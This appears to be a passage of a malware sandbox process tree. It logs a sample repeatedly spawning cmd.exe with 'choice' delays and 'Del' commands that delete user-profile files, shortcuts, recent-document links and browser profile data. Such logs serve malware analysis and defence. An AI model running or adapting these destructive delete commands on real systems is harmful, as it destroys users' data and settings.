C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png"3⤵PID:18004
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:24432
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png"3⤵PID:18020
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4648
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png"3⤵PID:18032
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13456
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png"3⤵PID:18044
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8508
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png"3⤵PID:18056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13048
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png"3⤵PID:18068
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13596
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png"3⤵PID:18080
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11012
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png"3⤵PID:18092
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14556
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png"3⤵PID:18104
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png"3⤵PID:18116
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3560
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png"3⤵PID:18128
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11708
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml"3⤵PID:18148
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11864
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt"3⤵PID:18180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13500
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"3⤵PID:18192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:24424
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"3⤵PID:18204
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13256
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk"3⤵PID:18216
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1880
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk"3⤵PID:18236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3248
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk"3⤵PID:18260
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Files.docx.lnk"3⤵PID:18272
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10200
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Opened.docx.lnk"3⤵PID:18292
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13472
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Recently.docx.lnk"3⤵PID:18304
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13380
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\These.docx.lnk"3⤵PID:18332
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1060
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"3⤵PID:18348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:664
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk"3⤵PID:18368
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13836
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\blurrect.png"3⤵PID:18380
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10988
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk"3⤵PID:18392
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10488
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk"3⤵PID:18408
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1220
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk"3⤵PID:18428
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:24416
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk"3⤵PID:16640
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4136
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk"3⤵PID:16940
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13572
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk"3⤵PID:17064
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2272
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Windows Terminal.lnk"3⤵PID:16860
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8824
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Windows Terminal.lnk"3⤵PID:16636
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10396
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk"3⤵PID:17220
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk"3⤵PID:17280
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1728
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk"3⤵PID:18456
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14208
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk"3⤵PID:18476
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13628
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk"3⤵PID:18488
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5436
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk"3⤵PID:18500
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9176
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk"3⤵PID:18512
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13840
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk"3⤵PID:18540
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10540
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk"3⤵PID:18560
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14876
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586187409503304.txt"3⤵PID:18580
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586189861131157.txt"3⤵PID:18600
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11544
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133586198240052432.txt"3⤵PID:18612
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12320
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools.lnk"3⤵PID:18632
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10924
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\File Explorer.lnk"3⤵PID:18652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4608
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk"3⤵PID:18676
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8820
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk"3⤵PID:18696
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13308
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ydz6lw8g.default-release\AlternateServices.txt"3⤵PID:18716
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1184
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ydz6lw8g.default-release\pkcs11.txt"3⤵PID:19032
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13992
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ydz6lw8g.default-release\SiteSecurityServiceState.txt"3⤵PID:19044
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13612
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C7D95PAM\update100[1].xml"3⤵PID:19056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3872
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png"3⤵PID:19068
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png"3⤵PID:19084
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6888
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png"3⤵PID:19096
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1108
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png"3⤵PID:19108
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7320
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png"3⤵PID:19124
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15412
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png"3⤵PID:19140
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8160
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png"3⤵PID:19160
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:876
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png"3⤵PID:19172
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14784
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\0Y5LKK0J\RW1dYo2[1].png"3⤵PID:19184
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11144
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\DFTDRE8U\RW1dRhL[1].png"3⤵PID:19196
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14652
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\DFTDRE8U\RW1kENf[1].png"3⤵PID:19208
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3776
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\P6VQJFSE\RW1dYo3[1].png"3⤵PID:19228
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16268
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\P6VQJFSE\RW1kPif[1].png"3⤵PID:19252
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13480
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\YRTUULXC\RW1dOLr[1].png"3⤵PID:19264
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:708
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AC\INetCache\YRTUULXC\RW1kPie[1].png"3⤵PID:19280
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13448
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e0d48a6-3356-466e-85d4-f6ae4fabb721}\0.0.filtertrie.intermediate.txt"3⤵PID:19296
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6088
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e0d48a6-3356-466e-85d4-f6ae4fabb721}\0.1.filtertrie.intermediate.txt"3⤵PID:19316
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13912
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e0d48a6-3356-466e-85d4-f6ae4fabb721}\0.2.filtertrie.intermediate.txt"3⤵PID:19332
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13416
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f61b004d-91b2-4e80-8f3b-a89a97b42e55}\0.0.filtertrie.intermediate.txt"3⤵PID:19344
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7700
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f61b004d-91b2-4e80-8f3b-a89a97b42e55}\0.1.filtertrie.intermediate.txt"3⤵PID:19360
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13276
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f61b004d-91b2-4e80-8f3b-a89a97b42e55}\0.2.filtertrie.intermediate.txt"3⤵PID:19372
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14516
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\appsconversions.txt"3⤵PID:19404
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9368
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\appsglobals.txt"3⤵PID:19432
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13344
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\appssynonyms.txt"3⤵PID:19452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:668
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\settingsconversions.txt"3⤵PID:17464
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1860
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\settingsglobals.txt"3⤵PID:16688
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:764
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f4be804c-43cc-468f-98ec-252f0c87fb98}\settingssynonyms.txt"3⤵PID:17876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12684
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{867ceb26-5a90-4428-a90f-866426f99c9d}\0.0.filtertrie.intermediate.txt"3⤵PID:16716
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15552
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{867ceb26-5a90-4428-a90f-866426f99c9d}\0.1.filtertrie.intermediate.txt"3⤵PID:18160
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3232
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{867ceb26-5a90-4428-a90f-866426f99c9d}\0.2.filtertrie.intermediate.txt"3⤵PID:17140
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14312
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk"3⤵PID:19820
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14432
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk"3⤵PID:19836
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11212
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"3⤵PID:19856
-
